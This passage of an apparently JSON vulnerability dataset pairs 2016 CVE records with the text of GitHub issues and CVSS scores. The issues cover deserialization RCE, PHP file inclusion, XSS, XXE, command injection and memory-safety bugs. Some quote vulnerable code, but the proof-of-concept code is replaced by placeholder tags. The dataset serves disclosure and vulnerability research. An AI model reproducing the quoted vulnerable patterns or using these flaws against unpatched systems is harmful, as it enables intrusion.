  1165. "description": "Sonartype vulnerability CVETAG in Spring web project. Affects NUMBERTAG RELEASE Issue Title : Sonartype vulnerability CVETAG in Spring web project Description Description from CVE Pivotal Spring Framework NUMBERTAG suffers from a potential remote code execution (RCE) issue if used for Java deserialization of untrusted data. Depending on how the library is implemented within a product, this issue may or not occur, and authentication may be required. Explanation The APITAG web package is vulnerable to deserialization of untrusted data leading to Remote Code Execution (RCE). The APITAG method in APITAG does not properly verify or restrict untrusted objects prior to deserializing them. An attacker can exploit this vulnerability by sending malicious requests containing crafted objects, which when deserialized, execute arbitrary code on the vulnerable system. NOTE: This vulnerability is related to a previously reported deserialization vulnerability ( CVETAG ) within the package, impacting a different class. Detection The application is vulnerable by using this component under specific scenarios as listed out in the advisory. Reference: URLTAG Recommendation There is no non vulnerable upgrade path for this component/package. We recommend investigating alternative components or a potential mitigating control. A warning has been provided in the official Javadocs of the APITAG class: \"WARNING: Be aware of vulnerabilities due to unsafe Java deserialization: Manipulated input streams could lead to unwanted code execution on the server during the deserialization step. As a consequence, do not expose HTTP invoker endpoints to untrusted clients but rather just between your own services. In general, we strongly recommend any other message format (e.g. JSON) instead.\" The developer's general advice also states: \"Do not use Java serialization for external endpoints, in particular not for unauthorized ones. 
HTTP invoker is not a well kept secret (or an \"oversight\") but rather the typical case of how a Spring application would expose serialization endpoints to begin with... he has a point that we should make this case all across our documentation, including the javadoc. But I don't really see a CVE case here, just a documentation improvement. Pivotal will enhance their documentation for the NUMBERTAG and NUMBERTAG releases.\" Reference: URLTAG Root Cause FILETAG <= PATHTAG NUMBERTAG Advisories Third Party: CVETAG Third Party: URLTAG CVSS Details CVE CVSS NUMBERTAG CVSS Vector: PATHTAG",
  1166. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  1167. "severity": "CRITICAL",
  1168. "baseScore": 9.8,
  1169. "impactScore": 5.9,
  1170. "exploitabilityScore": 3.9
  1171. },
  1172. {
  1173. "CVE_ID": "CVE-2016-10006",
  1174. "Issue_Url_old": "https://github.com/nahsra/antisamy/issues/2",
  1175. "Issue_Url_new": "https://github.com/nahsra/antisamy/issues/2",
  1176. "Repo_new": "nahsra/antisamy",
  1177. "Issue_Created_At": "2016-12-18T16:14:54Z",
  1178. "description": "Style validation in attributes isn't properly handled. Privately reported issue.",
  1179. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  1180. "severity": "MEDIUM",
  1181. "baseScore": 6.1,
  1182. "impactScore": 2.7,
  1183. "exploitabilityScore": 2.8
  1184. },
  1185. {
  1186. "CVE_ID": "CVE-2016-10060",
  1187. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/196",
  1188. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/196",
  1189. "Repo_new": "imagemagick/imagemagick",
  1190. "Issue_Created_At": "2016-05-06T18:04:21Z",
  1191. "description": "Completion of error handling. Would you like to add more error handling for return values from functions like the following? fputc]( FILETAG APITAG a byte on a stream\") \u21d2 APITAG URLTAG fwrite]( FILETAG APITAG output\") \u21d2 APITAG URLTAG",
  1192. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  1193. "severity": "MEDIUM",
  1194. "baseScore": 6.5,
  1195. "impactScore": 3.6,
  1196. "exploitabilityScore": 2.8
  1197. },
  1198. {
  1199. "CVE_ID": "CVE-2016-10065",
  1200. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/129",
  1201. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/129",
  1202. "Repo_new": "imagemagick/imagemagick",
  1203. "Issue_Created_At": "2016-02-12T22:31:09Z",
  1204. "description": "out of bounds read in APITAG CVETAG",
  1205. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  1206. "severity": "HIGH",
  1207. "baseScore": 7.8,
  1208. "impactScore": 5.9,
  1209. "exploitabilityScore": 1.8
  1210. },
  1211. {
  1212. "CVE_ID": "CVE-2016-10075",
  1213. "Issue_Url_old": "https://github.com/tqdm/tqdm/issues/328",
  1214. "Issue_Url_new": "https://github.com/tqdm/tqdm/issues/328",
  1215. "Repo_new": "tqdm/tqdm",
  1216. "Issue_Created_At": "2016-12-25T20:36:17Z",
  1217. "description": "APITAG insecure use of git. When you import tqdm , the APITAG module executes the following command: APITAG This was meant to check if the user is running a pre release version of tqdm. But most of the time there's no git repo at all, so this is just waste of time. Worse, the current working directory might be a part of an unrelated git repository, possibly a malicious one. At least with git NUMBERTAG or later, it's possible to craft a repo in which git log executes arbitrary code: CODETAG",
  1218. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  1219. "severity": "HIGH",
  1220. "baseScore": 7.8,
  1221. "impactScore": 5.9,
  1222. "exploitabilityScore": 1.8
  1223. },
  1224. {
  1225. "CVE_ID": "CVE-2016-10082",
  1226. "Issue_Url_old": "https://github.com/s9y/Serendipity/issues/433",
  1227. "Issue_Url_new": "https://github.com/s9y/serendipity/issues/433",
  1228. "Repo_new": "s9y/serendipity",
  1229. "Issue_Created_At": "2016-12-18T23:58:36Z",
  1230. "description": "File Inclusion Attack Possible RCE. Hello, In FILETAG NUMBERTAG APITAG = APITAG NUMBERTAG include_once (S9Y_INCLUDE_PATH . PATHTAG ); As you can see a user controlled variable, APITAG is being passed to an APITAG function without any validation, which results in file inclusion and remote code execution by referring to any file containing a PHP payload, in older PHP versions where null bytes NUMBERTAG are allowed in file paths. Thanks,",
  1231. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  1232. "severity": "CRITICAL",
  1233. "baseScore": 9.8,
  1234. "impactScore": 5.9,
  1235. "exploitabilityScore": 3.9
  1236. },
  1237. {
  1238. "CVE_ID": "CVE-2016-10083",
  1239. "Issue_Url_old": "https://github.com/Piwigo/Piwigo/issues/575",
  1240. "Issue_Url_new": "https://github.com/piwigo/piwigo/issues/575",
  1241. "Repo_new": "piwigo/piwigo",
  1242. "Issue_Created_At": "2016-12-18T23:40:33Z",
  1243. "description": "Cross Site Scripting. In PATHTAG CODETAG As you can see, the user controlled input $_GET['section'] ($filename) is being passed to APITAG and printed out without any sanitization; this could result in cross site scripting because APITAG prints out content just like APITAG before exit. Fix: encode the value for the HTML output context before it is echoed, e.g. htmlentities($filename, ENT_QUOTES);",
  1244. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  1245. "severity": "MEDIUM",
  1246. "baseScore": 6.1,
  1247. "impactScore": 2.7,
  1248. "exploitabilityScore": 2.8
  1249. },
  1250. {
  1251. "CVE_ID": "CVE-2016-10084",
  1252. "Issue_Url_old": "https://github.com/Piwigo/Piwigo/issues/572",
  1253. "Issue_Url_new": "https://github.com/piwigo/piwigo/issues/572",
  1254. "Repo_new": "piwigo/piwigo",
  1255. "Issue_Created_At": "2016-12-18T23:29:28Z",
  1256. "description": "File Inclusion Attack. Hello, There is a File Inclusion attack in the file PATHTAG It does: CODETAG The user controlled variable $page['tab'] is being passed to an APITAG without any checks, which makes file inclusion attacks possible. In older PHP versions, using a null byte attack, code execution is also possible. Fix: validate $page['tab'] against an allow-list of permitted strings before it is used in the include. Thanks,",
  1257. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  1258. "severity": "HIGH",
  1259. "baseScore": 7.2,
  1260. "impactScore": 5.9,
  1261. "exploitabilityScore": 1.2
  1262. },
  1263. {
  1264. "CVE_ID": "CVE-2016-10085",
  1265. "Issue_Url_old": "https://github.com/Piwigo/Piwigo/issues/573",
  1266. "Issue_Url_new": "https://github.com/piwigo/piwigo/issues/573",
  1267. "Repo_new": "piwigo/piwigo",
  1268. "Issue_Created_At": "2016-12-18T23:32:41Z",
  1269. "description": "File Inclusion Attack NUMBERTAG There is a File Inclusion attack in the file PATHTAG APITAG A user controlled variable is being sent straight to APITAG this should have checks for allowed strings before that. Thanks,",
  1270. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  1271. "severity": "HIGH",
  1272. "baseScore": 7.2,
  1273. "impactScore": 5.9,
  1274. "exploitabilityScore": 1.2
  1275. },
  1276. {
  1277. "CVE_ID": "CVE-2016-10096",
  1278. "Issue_Url_old": "https://github.com/semplon/GeniXCMS/issues/58",
  1279. "Issue_Url_new": "https://github.com/semplon/genixcms/issues/58",
  1280. "Repo_new": "semplon/genixcms",
  1281. "Issue_Created_At": "2016-03-22T16:38:55Z",
  1282. "description": "a security issues FILETAG for more details. Thanks",
  1283. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
  1284. "severity": "HIGH",
  1285. "baseScore": 7.3,
  1286. "impactScore": 3.4,
  1287. "exploitabilityScore": 3.9
  1288. },
  1289. {
  1290. "CVE_ID": "CVE-2016-10105",
  1291. "Issue_Url_old": "https://github.com/Piwigo/Piwigo/issues/574",
  1292. "Issue_Url_new": "https://github.com/piwigo/piwigo/issues/574",
  1293. "Repo_new": "piwigo/piwigo",
  1294. "Issue_Created_At": "2016-12-18T23:38:12Z",
  1295. "description": "File Inclusion with Possible RCE. In PATHTAG NUMBERTAG sections = explode('/', $_GET['section NUMBERTAG filename = PHPWG_PLUGINS_PATH . implode('/', $sections NUMBERTAG if(is_file($filename NUMBERTAG include_once ($filename); As you can see, a user controlled variable is being sent straight to APITAG; the explode/implode round trip does not strip '..' segments, so the path is not confined to PHPWG_PLUGINS_PATH. A person who managed to upload a .jpg file or any other content with a PHP payload will just need to refer to that location and APITAG will execute it, making code execution possible.",
  1296. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  1297. "severity": "CRITICAL",
  1298. "baseScore": 9.8,
  1299. "impactScore": 5.9,
  1300. "exploitabilityScore": 3.9
  1301. },
  1302. {
  1303. "CVE_ID": "CVE-2016-10127",
  1304. "Issue_Url_old": "https://github.com/rohe/pysaml2/issues/366",
  1305. "Issue_Url_new": "https://github.com/identitypython/pysaml2/issues/366",
  1306. "Repo_new": "identitypython/pysaml2",
  1307. "Issue_Created_At": "2016-10-06T15:50:31Z",
  1308. "description": "APITAG vulnerable to XXE. Roland ( APITAG Description An XML External Entity attack is a type of attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. This attack may lead to the disclosure of confidential data, denial of service, server side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts. It seems that the APITAG library does not consider the possibility of SAML \"XML\" requests or responses containing external entities or local file inclusion, so malicious XML requests or responses are able to trigger an XXE attack. Proof of Concept APITAG APITAG For more information refer to: URLTAG URLTAG Recommendations: It is my recommendation that external entity resolution should be disabled by default and, if necessary, exposed to the user as an explicit opt-in setting.",
  1309. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H",
  1310. "severity": "CRITICAL",
  1311. "baseScore": 9.0,
  1312. "impactScore": 6.0,
  1313. "exploitabilityScore": 2.3
  1314. },
  1315. {
  1316. "CVE_ID": "CVE-2016-10131",
  1317. "Issue_Url_old": "https://github.com/bcit-ci/CodeIgniter/issues/4963",
  1318. "Issue_Url_new": "https://github.com/bcit-ci/codeigniter/issues/4963",
  1319. "Repo_new": "bcit-ci/codeigniter",
  1320. "Issue_Created_At": "2016-12-26T17:22:08Z",
  1321. "description": "APITAG A critical vulnerability. Please read: FILETAG Please update: PATHTAG",
  1322. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  1323. "severity": "CRITICAL",
  1324. "baseScore": 9.8,
  1325. "impactScore": 5.9,
  1326. "exploitabilityScore": 3.9
  1327. },
  1328. {
  1329. "CVE_ID": "CVE-2016-10168",
  1330. "Issue_Url_old": "https://github.com/libgd/libgd/issues/354",
  1331. "Issue_Url_new": "https://github.com/libgd/libgd/issues/354",
  1332. "Repo_new": "libgd/libgd",
  1333. "Issue_Created_At": "2016-12-16T17:07:50Z",
  1334. "description": "Signed Integer Overflow gd_io.c. My sample: ./gd2togif test_file /dev/null APITAG runtime error: signed integer overflow NUMBERTAG cannot be represented in type 'int'",
  1335. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  1336. "severity": "HIGH",
  1337. "baseScore": 7.8,
  1338. "impactScore": 5.9,
  1339. "exploitabilityScore": 1.8
  1340. },
  1341. {
  1342. "CVE_ID": "CVE-2016-10173",
  1343. "Issue_Url_old": "https://github.com/halostatue/minitar/issues/16",
  1344. "Issue_Url_new": "https://github.com/halostatue/minitar/issues/16",
  1345. "Repo_new": "halostatue/minitar",
  1346. "Issue_Created_At": "2016-08-22T20:08:00Z",
  1347. "description": "Minitar directory traversal vulnerability. Overview Minitar allows attackers to overwrite arbitrary files during archive extraction via a .. (dot dot) in an extracted filename. Proof of Concept CODETAG Desired behaviour: ERRORTAG Example how bsdtar handles this kind of issues: ___ o Archive entries can have absolute pathnames. By default, tar removes the leading / character from filenames before restoring them to guard against this problem. o Archive entries can have pathnames that include .. components. By default, tar will not extract files containing .. components in their pathname. o Archive entries can exploit symbolic links to restore files to other directories. An archive can restore a symbolic link to another directory, then use that link to restore a file into that directory. To guard against this, tar checks each extracted path for symlinks. If the final path element is a symlink, it will be removed and replaced with the archive entry. If U is specified, any intermediate symlink will also be unconditionally removed. If neither U nor P is specified, tar will refuse to extract the entry. ___ Vulnerable, verified versions of gems: APITAG Related issue: URLTAG",
  1348. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  1349. "severity": "HIGH",
  1350. "baseScore": 7.5,
  1351. "impactScore": 3.6,
  1352. "exploitabilityScore": 3.9
  1353. },
  1354. {
  1355. "CVE_ID": "CVE-2016-10193",
  1356. "Issue_Url_old": "https://github.com/dejan/espeak-ruby/issues/7",
  1357. "Issue_Url_new": "https://github.com/dejan/espeak-ruby/issues/7",
  1358. "Repo_new": "dejan/espeak-ruby",
  1359. "Issue_Created_At": "2016-04-13T13:43:07Z",
  1360. "description": "Improper text validation enables reading ENV variables. This enables you to read env variables: speech = APITAG APITAG Since the text appears to be expanded by a shell, it may also be possible to perform command injection (RCE).",
  1361. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  1362. "severity": "CRITICAL",
  1363. "baseScore": 9.8,
  1364. "impactScore": 5.9,
  1365. "exploitabilityScore": 3.9
  1366. },
  1367. {
  1368. "CVE_ID": "CVE-2016-10194",
  1369. "Issue_Url_old": "https://github.com/spejman/festivaltts4r/issues/1",
  1370. "Issue_Url_new": "https://github.com/spejman/festivaltts4r/issues/1",
  1371. "Repo_new": "spejman/festivaltts4r",
  1372. "Issue_Created_At": "2016-04-22T20:58:28Z",
  1373. "description": "Command Injection. The APITAG and APITAG methods allow injection of arbitrary operating system commands. This may be problematic in the event user input is supplied to these methods. Proof of concept: CODETAG APITAG",
  1374. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  1375. "severity": "CRITICAL",
  1376. "baseScore": 9.8,
  1377. "impactScore": 5.9,
  1378. "exploitabilityScore": 3.9
  1379. },
  1380. {
  1381. "CVE_ID": "CVE-2016-10195",
  1382. "Issue_Url_old": "https://github.com/libevent/libevent/issues/317",
  1383. "Issue_Url_new": "https://github.com/libevent/libevent/issues/317",
  1384. "Repo_new": "libevent/libevent",
  1385. "Issue_Created_At": "2016-01-27T14:50:12Z",
  1386. "description": "libevent dns remote stack overread vulnerability. Hello, the APITAG function in libevent's DNS code is vulnerable to a buffer overread NUMBERTAG if (cp != name_out NUMBERTAG if (cp NUMBERTAG end) return NUMBERTAG cp NUMBERTAG if (cp + label_len >= end) return NUMBERTAG memcpy(cp, packet + j, label_len NUMBERTAG cp += label_len NUMBERTAG j += label_len; The only bound checked is the output buffer (cp against end); no check is made that j + label_len stays within the received packet's length before the memcpy reads from packet + j. This was found through the Tor bug bounty program and the discovery should be credited to APITAG Vranken'.",
  1387. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  1388. "severity": "CRITICAL",
  1389. "baseScore": 9.8,
  1390. "impactScore": 5.9,
  1391. "exploitabilityScore": 3.9
  1392. },
  1393. {
  1394. "CVE_ID": "CVE-2016-10196",
  1395. "Issue_Url_old": "https://github.com/libevent/libevent/issues/318",
  1396. "Issue_Url_new": "https://github.com/libevent/libevent/issues/318",
  1397. "Repo_new": "libevent/libevent",
  1398. "Issue_Created_At": "2016-01-27T14:53:17Z",
  1399. "description": "libevent (stack) buffer overflow in APITAG Hello, in APITAG NUMBERTAG char buf NUMBERTAG cp = strchr(ip_as_string NUMBERTAG if ( ip_as_string NUMBERTAG int len NUMBERTAG if (!(cp = strchr(ip_as_string NUMBERTAG return NUMBERTAG len = (int) ( cp (ip_as_string NUMBERTAG if (len > (int)sizeof(buf NUMBERTAG return NUMBERTAG memcpy(buf, ip_as_string NUMBERTAG len); Length between '[' and ']' is cast to signed NUMBERTAG bit integer on line NUMBERTAG If the length is more than NUMBERTAG INT_MAX), len will hold a negative value. Consequently, it will pass the check at line NUMBERTAG Segfault happens at line NUMBERTAG Generate a APITAG with generate APITAG then compile and run poc.c. See FILETAG for functions in tor that might be vulnerable. Please credit APITAG Vranken' for this discovery through the Tor bug bounty program.",
  1400. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  1401. "severity": "HIGH",
  1402. "baseScore": 7.5,
  1403. "impactScore": 3.6,
  1404. "exploitabilityScore": 3.9
  1405. },
  1406. {
  1407. "CVE_ID": "CVE-2016-10197",
  1408. "Issue_Url_old": "https://github.com/libevent/libevent/issues/332",
  1409. "Issue_Url_new": "https://github.com/libevent/libevent/issues/332",
  1410. "Repo_new": "libevent/libevent",
  1411. "Issue_Created_At": "2016-03-03T15:00:09Z",
  1412. "description": "out of bounds read in APITAG Here follows a bug report by Guido Vranken via the APITAG bug bounty program_. Please credit Guido accordingly. Bug report The DNS code of Libevent contains this rather obvious OOB read: CODETAG If the length of APITAG is NUMBERTAG then line NUMBERTAG reads NUMBERTAG byte before the buffer. This will trigger a crash on ASAN protected builds. To reproduce: Build libevent with ASAN: APITAG Put the attached APITAG and APITAG in the source directory and then do: ERRORTAG This happens because I create a zero length string in APITAG : APITAG If you uncomment the last line, it will not crash. Guido",
  1413. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  1414. "severity": "HIGH",
  1415. "baseScore": 7.5,
  1416. "impactScore": 3.6,
  1417. "exploitabilityScore": 3.9
  1418. },
  1419. {
  1420. "CVE_ID": "CVE-2016-10209",
  1421. "Issue_Url_old": "https://github.com/libarchive/libarchive/issues/842",
  1422. "Issue_Url_new": "https://github.com/libarchive/libarchive/issues/842",
  1423. "Repo_new": "libarchive/libarchive",
  1424. "Issue_Created_At": "2016-12-12T17:47:50Z",
  1425. "description": "SIGSEGV in APITAG APITAG SIGSEGV in APITAG APITAG Tested on Git HEAD: APITAG Payload: URLTAG To reproduce: APITAG ASAN Output: ERRORTAG APITAG NUMBERTAG ABORTING",
  1426. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  1427. "severity": "MEDIUM",
  1428. "baseScore": 5.5,
  1429. "impactScore": 3.6,
  1430. "exploitabilityScore": 1.8
  1431. },
  1432. {
  1433. "CVE_ID": "CVE-2016-10210",
  1434. "Issue_Url_old": "https://github.com/VirusTotal/yara/issues/576",
  1435. "Issue_Url_new": "https://github.com/virustotal/yara/issues/576",
  1436. "Repo_new": "virustotal/yara",
  1437. "Issue_Created_At": "2016-12-06T09:18:57Z",
  1438. "description": "Null Pointer Dereference in APITAG Null Pointer Dereference in APITAG Tested on latest Git HEAD: APITAG FILETAG To reproduce: APITAG ASAN output: ERRORTAG",
  1439. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  1440. "severity": "HIGH",
  1441. "baseScore": 7.5,
  1442. "impactScore": 3.6,
  1443. "exploitabilityScore": 3.9
  1444. },
  1445. {
  1446. "CVE_ID": "CVE-2016-10211",
  1447. "Issue_Url_old": "https://github.com/VirusTotal/yara/issues/575",
  1448. "Issue_Url_new": "https://github.com/virustotal/yara/issues/575",
  1449. "Repo_new": "virustotal/yara",
  1450. "Issue_Created_At": "2016-12-06T09:15:26Z",
  1451. "description": "Use After Free in APITAG Use After Free in APITAG Tested on latest Git HEAD: APITAG FILETAG To reproduce: APITAG ASAN output: ERRORTAG",
  1452. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  1453. "severity": "HIGH",
  1454. "baseScore": 7.5,
  1455. "impactScore": 3.6,
  1456. "exploitabilityScore": 3.9
  1457. },
  1458. {
  1459. "CVE_ID": "CVE-2016-10216",
  1460. "Issue_Url_old": "https://github.com/sivann/itdb/issues/56",
  1461. "Issue_Url_new": "https://github.com/sivann/itdb/issues/56",
  1462. "Repo_new": "sivann/itdb",
  1463. "Issue_Created_At": "2016-11-28T07:01:45Z",
  1464. "description": "itdb NUMBERTAG Cross Site Scripting (XSS). APITAG itdb NUMBERTAG Cross Site Scripting APITAG",
  1465. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  1466. "severity": "MEDIUM",
  1467. "baseScore": 6.1,
  1468. "impactScore": 2.7,
  1469. "exploitabilityScore": 2.8
  1470. },
  1471. {
  1472. "CVE_ID": "CVE-2016-10252",
  1473. "Issue_Url_old": "https://github.com/Opendigitalradio/ODR-PadEnc/issues/2",
  1474. "Issue_Url_new": "https://github.com/opendigitalradio/odr-padenc/issues/2",
  1475. "Repo_new": "opendigitalradio/odr-padenc",
  1476. "Issue_Created_At": "2017-03-07T18:13:36Z",
  1477. "description": "Memory leak. I have found out a memory leak in ODR APITAG NUMBERTAG FILETAG I have a multiplexer where I run NUMBERTAG instances of odr padenc. They are executed as the following CODETAG PATHTAG contains only one PNG image and is not updated. I have noticed that at some point I stopped having log messages from padenc but process keeps running. When I did APITAG there were some data NUMBERTAG screens on terminal).",
  1478. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  1479. "severity": "HIGH",
  1480. "baseScore": 7.5,
  1481. "impactScore": 3.6,
  1482. "exploitabilityScore": 3.9
  1483. },
  1484. {
  1485. "CVE_ID": "CVE-2016-10321",
  1486. "Issue_Url_old": "https://github.com/web2py/web2py/issues/1585",
  1487. "Issue_Url_new": "https://github.com/web2py/web2py/issues/1585",
  1488. "Repo_new": "web2py/web2py",
  1489. "Issue_Created_At": "2017-03-05T02:29:48Z",
  1490. "description": "CVETAG , CVETAG , CVETAG . Hello, several security vulnerabilities were reported for web2py and they already got CVEs assigned. I could not find any information about them in your git repository. Are you aware of them and are there any fixes available? URLTAG",
  1491. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  1492. "severity": "CRITICAL",
  1493. "baseScore": 9.8,
  1494. "impactScore": 5.9,
  1495. "exploitabilityScore": 3.9
  1496. },
  1497. {
  1498. "CVE_ID": "CVE-2016-10349",
  1499. "Issue_Url_old": "https://github.com/libarchive/libarchive/issues/834",
  1500. "Issue_Url_new": "https://github.com/libarchive/libarchive/issues/834",
  1501. "Repo_new": "libarchive/libarchive",
  1502. "Issue_Created_At": "2016-12-06T11:04:14Z",
  1503. "description": "heap buffer overflow in archive_le NUMBERTAG dec. On NUMBERTAG ERRORTAG Testcase: URLTAG Could you check if it is a duplicate of NUMBERTAG or a similar bug?",
  1504. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  1505. "severity": "MEDIUM",
  1506. "baseScore": 5.5,
  1507. "impactScore": 3.6,
  1508. "exploitabilityScore": 1.8
  1509. },
  1510. {
  1511. "CVE_ID": "CVE-2016-10350",
  1512. "Issue_Url_old": "https://github.com/libarchive/libarchive/issues/835",
  1513. "Issue_Url_new": "https://github.com/libarchive/libarchive/issues/835",
  1514. "Repo_new": "libarchive/libarchive",
  1515. "Issue_Created_At": "2016-12-06T11:07:26Z",
  1516. "description": "heap buffer overflow in APITAG On NUMBERTAG ERRORTAG Testcase: URLTAG Could you check if it is a duplicate of NUMBERTAG or a similar bug?",
  1517. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  1518. "severity": "MEDIUM",
  1519. "baseScore": 5.5,
  1520. "impactScore": 3.6,
  1521. "exploitabilityScore": 1.8
  1522. },
  1523. {
  1524. "CVE_ID": "CVE-2016-10351",
  1525. "Issue_Url_old": "https://github.com/telegramdesktop/tdesktop/issues/2666",
  1526. "Issue_Url_new": "https://github.com/telegramdesktop/tdesktop/issues/2666",
  1527. "Repo_new": "telegramdesktop/tdesktop",
  1528. "Issue_Created_At": "2016-11-23T14:51:44Z",
  1529. "description": "set better permission on APITAG Hello, by default the APITAG directory has NUMBERTAG APITAG I think it would be great to set it to NUMBERTAG or NUMBERTAG While the main homedir has NUMBERTAG and it happens by default here), a local user can obtain the contents of APITAG I did not investigate what a local user who obtains those files can eventually steal. Thanks.",
  1530. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
  1531. "severity": "MEDIUM",
  1532. "baseScore": 5.5,
  1533. "impactScore": 3.6,
  1534. "exploitabilityScore": 1.8
  1535. },
  1536. {
  1537. "CVE_ID": "CVE-2016-10375",
  1538. "Issue_Url_old": "https://github.com/fbb-git/yodl/issues/1",
  1539. "Issue_Url_new": "https://github.com/fbb-git/yodl/issues/1",
  1540. "Repo_new": "fbb-git/yodl",
  1541. "Issue_Created_At": "2016-02-04T06:33:18Z",
  1542. "description": "invalid memory read in queuepush.c / function APITAG Compiling yodl with address sanitizer ( fsanitize=address) shows an invalid memory read in the function APITAG I tried to look at the source and find the bug, but I'm not familiar with the code base and was unable to easily determine the reason. This can be reproduced simply by trying to compile everything with address sanitizer enabled: CFLAGS=\" fsanitize=address g\" LDFLAGS=\" fsanitize=address\" ./build programs CFLAGS=\" fsanitize=address g\" LDFLAGS=\" fsanitize=address\" ./build macros CFLAGS=\" fsanitize=address g\" LDFLAGS=\" fsanitize=address\" ./build man This was tested with release NUMBERTAG The error message from address sanitizer NUMBERTAG ERROR: APITAG unknown crash on address NUMBERTAG ee NUMBERTAG at pc NUMBERTAG d NUMBERTAG bp NUMBERTAG ffe NUMBERTAG bc0 sp NUMBERTAG ffe NUMBERTAG bb0 READ of size NUMBERTAG at NUMBERTAG ee NUMBERTAG thread T NUMBERTAG d NUMBERTAG in queue_push PATHTAG NUMBERTAG d in lexer_push_str PATHTAG NUMBERTAG c6b0 in p_expand_macro PATHTAG NUMBERTAG c0d7 in p_default_symbol PATHTAG NUMBERTAG b3 in p_handle_default_symbol PATHTAG NUMBERTAG dd NUMBERTAG in p_parse PATHTAG NUMBERTAG cbe6 in parser_process PATHTAG NUMBERTAG e5a in main PATHTAG NUMBERTAG f0ed NUMBERTAG d NUMBERTAG f in __libc_start_main APITAG NUMBERTAG e NUMBERTAG in _start ( PATHTAG NUMBERTAG efd7 is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG f0ed5aab7d7 in malloc ( PATHTAG NUMBERTAG c4b in n_malloc PATHTAG NUMBERTAG in new_memory PATHTAG NUMBERTAG e1 in queue_construct PATHTAG NUMBERTAG b in l_media_construct_memory PATHTAG NUMBERTAG a8 in l_push PATHTAG NUMBERTAG in lexer_push_str PATHTAG NUMBERTAG c6b0 in p_expand_macro PATHTAG NUMBERTAG c0d7 in p_default_symbol PATHTAG NUMBERTAG b3 in p_handle_default_symbol PATHTAG NUMBERTAG dd NUMBERTAG in p_parse PATHTAG NUMBERTAG cbe6 in parser_process PATHTAG NUMBERTAG e5a in 
main PATHTAG NUMBERTAG f0ed NUMBERTAG d NUMBERTAG f in __libc_start_main APITAG SUMMARY: APITAG unknown crash PATHTAG queue_push Shadow bytes around the buggy address NUMBERTAG c NUMBERTAG fff9d NUMBERTAG fd fd fd fd fd fd fd fd fd fd fd fd fd fd fa fa NUMBERTAG c NUMBERTAG fff9d NUMBERTAG fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd NUMBERTAG c NUMBERTAG fff9d NUMBERTAG fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd NUMBERTAG c NUMBERTAG fff9da0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd NUMBERTAG c NUMBERTAG fff9db0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fa NUMBERTAG c NUMBERTAG fff9dc0: fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9dd NUMBERTAG c NUMBERTAG fff9de NUMBERTAG c NUMBERTAG fff9df NUMBERTAG fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9e NUMBERTAG fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd NUMBERTAG c NUMBERTAG fff9e NUMBERTAG fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd 